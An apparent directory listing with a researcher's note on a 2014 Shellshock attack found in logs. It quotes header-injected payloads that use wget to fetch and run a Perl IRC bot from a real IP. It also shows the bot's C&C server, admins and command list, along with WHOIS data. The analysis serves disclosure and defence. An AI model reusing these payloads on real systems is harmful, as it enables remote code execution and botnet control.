Index of /Systeme/shellshock

[ICO]NameLast modifiedSizeDescription

[PARENTDIR]Parent Directory  -  
[   ]irc_logs_201208072014-10-07 21:21 39K 
[TXT]legend2011.txt2014-10-07 20:41 33K 
[TXT]legend2012.txt2014-10-07 21:07 29K 

This shellshock exploitation just appeared in some logs:

To:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
References:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Cc:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
From:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend
Subject:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend

Script legend.txt is also here: http://pastebin.com/Z9VVwvUr 

$ host 190.94.251.41
41.251.94.190.in-addr.arpa domain name pointer 190-94-251-41.ifxnw.com.ve.

inetnum:     190.94.224/19
owner:       IFX Networks Venezuela C.A.
ownerid:     VE-EMCA-LACNIC
responsible: Juan C. Crespo R.
address:     Av El Bosque c/ Calle Santa Lucia, Torre Credicard, 416, Piso 5
address:     1050 - Caracas - DF
country:     VE

=> AS18747


Interesting bits with IRC C&C address:
my @admins=("god","ARZ","Zax");
my @hostauth=("legend.rocks");
my @channels=("#apache");
my $nick= 'OLD';
my $ircname = 'Apache';
my $realname = '$uname';
my $server='62.193.210.216';
my $port='7777';

$ host 62.193.210.216
216.210.193.62.in-addr.arpa domain name pointer vds-925735.amen-pro.com.

aut-num:        AS28677
as-name:        AMEN
descr:          AMEN Network

C&C IRC commands in 2011 version:
!legend @system
!legend @rootable
!legend @cleanlogs
!legend @socks5
!legend @nmap   
!legend @back 
!legend @sqlflood